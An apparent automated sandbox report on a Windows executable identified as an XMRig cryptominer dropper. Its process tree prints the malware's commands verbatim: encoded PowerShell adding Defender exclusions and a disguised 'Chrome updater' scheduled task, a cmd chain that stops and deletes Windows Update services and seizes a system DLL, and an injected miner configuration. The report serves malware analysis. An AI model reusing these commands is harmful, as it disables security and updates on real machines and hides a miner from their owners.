Analysis
-
max time kernel
150s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20220901-en -
resource tags
-
submitted
10-11-2022 19:06
General
-
Target
a9cd4676ee19c15148cf4590b9f32363bd61ecb3ddfc28673a797e8cf3fda5a7.exe
-
Size
2.5MB
-
MD5
3db308a4a293420df30a444944f2ccb6
-
SHA1
4cae8d8a25167bc0ce3e8bfae7ccde1b82f7b0ea
-
SHA256
a9cd4676ee19c15148cf4590b9f32363bd61ecb3ddfc28673a797e8cf3fda5a7
-
SHA512
a74aea4470291b28a04d7eff1ec2e00fd5e445f6235c8e266a34f5041c63c875f874a8e66eb8c10ea0a56c7ee2130deaf2addc011959942296b015293f805c79
-
SSDEEP
49152:BIX8orGKWyNi/abKDNtEgSsoi/hiO0WygnaWjIe1BSORYt3m5rj4A19oo/tGIPIP:bBsi/cKRt1SsoipihWyzcbaqYpm5wA10
Score
10/10
Malware Config
Signatures
-
Modifies security service 2 TTPs 5 IoCs
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
XMRig Miner payload 6 IoCs
-
Executes dropped EXE 1 IoCs
-
Possible privilege escalation attempt 4 IoCs
-
Stops running service(s) 3 TTPs
-
Modifies file permissions 1 TTPs 4 IoCs
-
Drops file in System32 directory 4 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
-
Drops file in Program Files directory 3 IoCs
-
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Modifies data under HKEY_USERS 64 IoCs
-
Modifies registry key 1 TTPs 18 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\a9cd4676ee19c15148cf4590b9f32363bd61ecb3ddfc28673a797e8cf3fda5a7.exe"C:\Users\Admin\AppData\Local\Temp\a9cd4676ee19c15148cf4590b9f32363bd61ecb3ddfc28673a797e8cf3fda5a7.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\a9cd4676ee19c15148cf4590b9f32363bd61ecb3ddfc28673a797e8cf3fda5a7.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAcABpAGgAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBvAHkAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAbwBwAHIAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAZgB0ACMAPgA="3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exesc stop UsoSvc4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop bits4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop dosvc4⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f4⤵
- Modifies security service
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 03⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAdAB3ACMAPgAgAFIAZQBnAGkAcwB0AGUAcgAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAIAAtAEEAYwB0AGkAbwBuACAAKABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAQQBjAHQAaQBvAG4AIAAtAEUAeABlAGMAdQB0AGUAIAAnAHAAbwB3AGUAcgBzAGgAZQBsAGwAJwAgAC0AQQByAGcAdQBtAGUAbgB0ACAAJwAtAEUAbgBjAG8AZABlAGQAQwBvAG0AbQBhAG4AZAAgACIAUABBAEEAagBBAEgASQBBAGIAdwBCAGoAQQBDAE0AQQBQAGcAQQBnAEEARgBNAEEAZABBAEIAaABBAEgASQBBAGQAQQBBAHQAQQBGAEEAQQBjAGcAQgB2AEEARwBNAEEAWgBRAEIAegBBAEgATQBBAEkAQQBBAHQAQQBFAFkAQQBhAFEAQgBzAEEARwBVAEEAVQBBAEIAaABBAEgAUQBBAGEAQQBBAGcAQQBDAGMAQQBRAHcAQQA2AEEARgB3AEEAVQBBAEIAeQBBAEcAOABBAFoAdwBCAHkAQQBHAEUAQQBiAFEAQQBnAEEARQBZAEEAYQBRAEIAcwBBAEcAVQBBAGMAdwBCAGMAQQBFAGMAQQBiAHcAQgB2AEEARwBjAEEAYgBBAEIAbABBAEYAdwBBAFEAdwBCAG8AQQBIAEkAQQBiAHcAQgB0AEEARwBVAEEAWABBAEIAMQBBAEgAQQBBAFoAQQBCAGgAQQBIAFEAQQBaAFEAQgB5AEEAQwA0AEEAWgBRAEIANABBAEcAVQBBAEoAdwBBAGcAQQBDADAAQQBWAGcAQgBsAEEASABJAEEAWQBnAEEAZwBBAEYASQBBAGQAUQBCAHUAQQBFAEUAQQBjAHcAQQBnAEEARAB3AEEASQB3AEIAbABBAEcATQBBAEkAdwBBACsAQQBBAD0APQAiACcAKQAgADwAIwB0AHQAdwAjAD4AIAAtAFQAcgBpAGcAZwBlAHIAIAAoAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBUAHIAaQBnAGcAZQByACAALQBBAHQAUwB0AGEAcgB0AHUAcAApACAAPAAjAGcAegAjAD4AIAAtAFMAZQB0AHQAaQBuAGcAcwAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFMAZQB0AHQAaQBuAGcAcwBTAGUAdAAgAC0AQQBsAGwAbwB3AFMAdABhAHIAdABJAGYATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAGkAcwBhAGwAbABvAHcASABhAHIAZABUAGUAcgBtAGkAbgBhAHQAZQAgAC0ARABvAG4AdABTAHQAbwBwAEkAZgBHAG8AaQBuAGcATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAG8AbgB0AFMAdABvAHAATwBuAEkAZABsAGUARQBuAGQAIAAtAEUAeABlAGMAdQB0AGkAbwBuAFQAaQBtAGUATABpAG0AaQB0ACAAKABOAGUAdwAtAFQAaQBtAGUAUwBwAGEAbgAgAC0ARABhAHkAcwAgADEAMAAwADAAKQApACAAPAAjAHoAYgBkAGYAIwA+ACAALQBUAGEAcwBrAE4AYQBtAGUAIAAnAEcAbwBvAGcAbABlAFUAcABkAGEAdABlAFQAYQBzAGsATQBhAGMAaABpAG4AZQBRAEMAJwAgAC0AVQBzAGUAcgAgACcAUwB5AHMAdABlAG0AJwAgAC0AUgB1AG4ATABlAHYAZQBsACAAJwBIAGkAZwBoAGUAcwB0ACcAIAAtAEYAbwByAGMAZQAgADwAIwBnAGYAeQAjAD4AOwAgAEMAbwBwAHkALQBJAHQAZQBtACAAJwBDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcAGEAOQBjAGQANAA2ADcANgBlAGUAMQA5AGMAMQA1ADEANAA4AGMAZgA0ADUAOQAwAGIAOQBmADMAMgAzADYAMwBiAGQANgAxAGUAYwBiADMAZABkAGYAYwAyADgANgA3ADMAYQA3ADkANwBlADgAYwBmADMAZgBkAGEANQBhADcALgBlAHgAZQAnACAALQBEAGUAcwB0AGkAbgBhAHQAaQBvAG4AIAAnAEMAOgBcAFAAcgBvAGcAcgBhAG0AIABGAGkAbABlAHMAXABHAG8AbwBnAGwAZQBcAEMAaAByAG8AbQBlAFwAdQBwAGQAYQB0AGUAcgAuAGUAeABlACcAIAAtAEYAbwByAGMAZQAgADwAIwB1AHQAcAAjAD4AOwAgAFMAdABhAHIAdAAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAIAA8ACMAdwB6AGkAIwA+ACAALQBUAGEAcwBrAE4AYQBtAGUAIAAnAEcAbwBvAGcAbABlAFUAcABkAGEAdABlAFQAYQBzAGsATQBhAGMAaABpAG4AZQBRAEMAJwA7AA=="3⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -EncodedCommand "PAAjAHIAbwBjACMAPgAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACcAQwA6AFwAUAByAG8AZwByAGEAbQAgAEYAaQBsAGUAcwBcAEcAbwBvAGcAbABlAFwAQwBoAHIAbwBtAGUAXAB1AHAAZABhAHQAZQByAC4AZQB4AGUAJwAgAC0AVgBlAHIAYgAgAFIAdQBuAEEAcwAgADwAIwBlAGMAIwA+AA=="1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"2⤵
- Executes dropped EXE
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Program Files\Google\Chrome\updater.exe"3⤵
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAcABpAGgAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBvAHkAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAbwBwAHIAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAZgB0ACMAPgA="4⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE4⤵
-
C:\Windows\system32\sc.exesc stop UsoSvc5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv5⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f5⤵
- Modifies registry key
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll5⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q5⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f5⤵
- Modifies registry key
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE5⤵
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f5⤵
- Modifies registry key
-
C:\Windows\system32\sc.exesc stop dosvc5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop bits5⤵
- Launches sc.exe
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 04⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 05⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 05⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 05⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 05⤵
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe "giyxhlnw"4⤵
-
C:\Windows\System32\notepad.exeC:\Windows\System32\notepad.exe xzdqclthzpcazp0 6E3sjfZq2rJQaxvLPmXgsBL6xjjYguHWtOpZ+stIdvsjpN5Mqdy4DBfa6KATFfaKQjZcNqd1938GRB8dGIm2jUo1P1EwqD6WsAjiwuDAWLCfR3BRzADWgpJ7CQxFR7+anCrIhDT/00bieUv+n3qzA/ZBTeGzJOEzp2ufDT4ez7i94dFOd7htQWVDfk0FvX4a+088kTIG70C+qoBp7PPo1o2A5n8KneHMS5/guyM+nQkyz5PCuPtW1otcyRyfkXuJFiqnw4xHcIav5OP5k07szbPwxOTbqWzmU88osXNGi3m9t4Gwg0G56kg7iABsHbrK5UzmJ/FgcEz0jZ/3un+gS+Rf+IWiuYLXvFLT3dhSYQEp2MbWtYrce1ynEL2g4m1i3nZh07E/ntkN3OenhsoDXadhJLavl9NK0sNtCm2olw7Es0i9g5kp1KX++H2R+p8TerO894R0g6VcrvRRJ+3FNfFJEDMYbyeu61ZEsJe2P9UVJBbbbkXTZny0JoLyKbpVAGAT9wmmSPrpsDA8G3bbPD2mzExQDUSq6vDCincR1pfndSpJ6ETOEAak8MK+m/fKPDk8iiEXOF+mvhBrtYGTnSCz2kL1bsCs/yWKCKTGO/4=4⤵
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files\Google\Chrome\updater.exeFilesize
2.5MB
MD53db308a4a293420df30a444944f2ccb6
SHA14cae8d8a25167bc0ce3e8bfae7ccde1b82f7b0ea
SHA256a9cd4676ee19c15148cf4590b9f32363bd61ecb3ddfc28673a797e8cf3fda5a7
SHA512a74aea4470291b28a04d7eff1ec2e00fd5e445f6235c8e266a34f5041c63c875f874a8e66eb8c10ea0a56c7ee2130deaf2addc011959942296b015293f805c79
-
C:\Program Files\Google\Chrome\updater.exeFilesize
2.5MB
MD53db308a4a293420df30a444944f2ccb6
SHA14cae8d8a25167bc0ce3e8bfae7ccde1b82f7b0ea
SHA256a9cd4676ee19c15148cf4590b9f32363bd61ecb3ddfc28673a797e8cf3fda5a7
SHA512a74aea4470291b28a04d7eff1ec2e00fd5e445f6235c8e266a34f5041c63c875f874a8e66eb8c10ea0a56c7ee2130deaf2addc011959942296b015293f805c79
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
2KB
MD5440cb38dbee06645cc8b74d51f6e5f71
SHA1d7e61da91dc4502e9ae83281b88c1e48584edb7c
SHA2568ef7a682dfd99ff5b7e9de0e1be43f0016d68695a43c33c028af2635cc15ecfe
SHA5123aab19578535e6ba0f6beb5690c87d970292100704209d2dcebddcdd46c6bead27588ef5d98729bfd50606a54cc1edf608b3d15bef42c13b9982aaaf15de7fd6
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD5d260b9113078da49af4677c7901f5a03
SHA17d0778773d3d1e765a884bb03acdbccdeece582c
SHA256e4e51ddb68b0d36fd0d284c35a13e24dcd60b405fde030db98d73e5035fc028a
SHA512e89c9b953aca2f489affeacc6392459f55ae78658a65d78802f4468c0dddd1689092c84bed3d7cb199bb508558fd1997f757422d76b82d55b1c070f64845d356
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
2KB
MD56cf293cb4d80be23433eecf74ddb5503
SHA124fe4752df102c2ef492954d6b046cb5512ad408
SHA256b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA5120f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD52238871af228384f4b8cdc65117ba9f1
SHA12a200725f1f32e5a12546aa7fd7a8c5906757bd1
SHA256daa246f73567ad176e744abdb82d991dd8cffe0e2d847d2feefeb84f7fa5f882
SHA5121833d508fdbe2b8722b787bfc0c1848a5bcdeb7ec01e94158d78e9e6ceb397a2515d88bb8ca4ec1a810263fc900b5b1ea1d788aa103967ed61436e617fab47bf
-
memory/212-194-0x0000000000000000-mapping.dmp
-
memory/396-159-0x0000000000000000-mapping.dmp
-
memory/540-167-0x0000000000000000-mapping.dmp
-
memory/720-141-0x0000000000000000-mapping.dmp
-
memory/824-210-0x0000000000000000-mapping.dmp
-
memory/872-223-0x0000000000000000-mapping.dmp
-
memory/880-152-0x0000000000000000-mapping.dmp
-
memory/908-138-0x0000000000000000-mapping.dmp
-
memory/948-143-0x0000000000000000-mapping.dmp
-
memory/1288-169-0x0000000000000000-mapping.dmp
-
memory/1388-140-0x0000000000000000-mapping.dmp
-
memory/1388-208-0x0000000000000000-mapping.dmp
-
memory/1404-213-0x0000000000000000-mapping.dmp
-
memory/1492-168-0x0000000000000000-mapping.dmp
-
memory/1668-165-0x0000000000000000-mapping.dmp
-
memory/1804-221-0x0000000000000000-mapping.dmp
-
memory/2236-157-0x0000000000000000-mapping.dmp
-
memory/2444-177-0x00007FF8F8AD0000-0x00007FF8F9591000-memory.dmpFilesize
10.8MB
-
memory/2444-132-0x0000000000000000-mapping.dmp
-
memory/2444-136-0x00007FF8F8AD0000-0x00007FF8F9591000-memory.dmpFilesize
10.8MB
-
memory/2444-133-0x000001F7C5250000-0x000001F7C5272000-memory.dmpFilesize
136KB
-
memory/2676-192-0x0000000000000000-mapping.dmp
-
memory/2812-214-0x0000000000000000-mapping.dmp
-
memory/2884-181-0x00007FF8F9830000-0x00007FF8FA2F1000-memory.dmpFilesize
10.8MB
-
memory/2884-195-0x000001EEC1960000-0x000001EEC1972000-memory.dmpFilesize
72KB
-
memory/2884-204-0x00007FF8F9830000-0x00007FF8FA2F1000-memory.dmpFilesize
10.8MB
-
memory/2908-155-0x0000000000000000-mapping.dmp
-
memory/2956-193-0x0000000000000000-mapping.dmp
-
memory/2984-154-0x0000000000000000-mapping.dmp
-
memory/3064-198-0x0000000000000000-mapping.dmp
-
memory/3116-219-0x0000000000000000-mapping.dmp
-
memory/3132-153-0x0000000000000000-mapping.dmp
-
memory/3312-207-0x0000000000000000-mapping.dmp
-
memory/3348-146-0x0000000000000000-mapping.dmp
-
memory/3392-162-0x0000000000000000-mapping.dmp
-
memory/3436-211-0x0000000000000000-mapping.dmp
-
memory/3436-142-0x0000000000000000-mapping.dmp
-
memory/3456-215-0x0000000000000000-mapping.dmp
-
memory/3496-226-0x0000000140000000-0x0000000140809000-memory.dmpFilesize
8.0MB
-
memory/3496-228-0x0000000140000000-0x0000000140809000-memory.dmpFilesize
8.0MB
-
memory/3496-199-0x0000000140000000-0x0000000140809000-memory.dmpFilesize
8.0MB
-
memory/3496-200-0x000000014036EAC4-mapping.dmp
-
memory/3496-201-0x0000000140000000-0x0000000140809000-memory.dmpFilesize
8.0MB
-
memory/3496-203-0x0000000140000000-0x0000000140809000-memory.dmpFilesize
8.0MB
-
memory/3496-205-0x0000018104B10000-0x0000018104B30000-memory.dmpFilesize
128KB
-
memory/3620-224-0x0000000000000000-mapping.dmp
-
memory/3768-145-0x0000000000000000-mapping.dmp
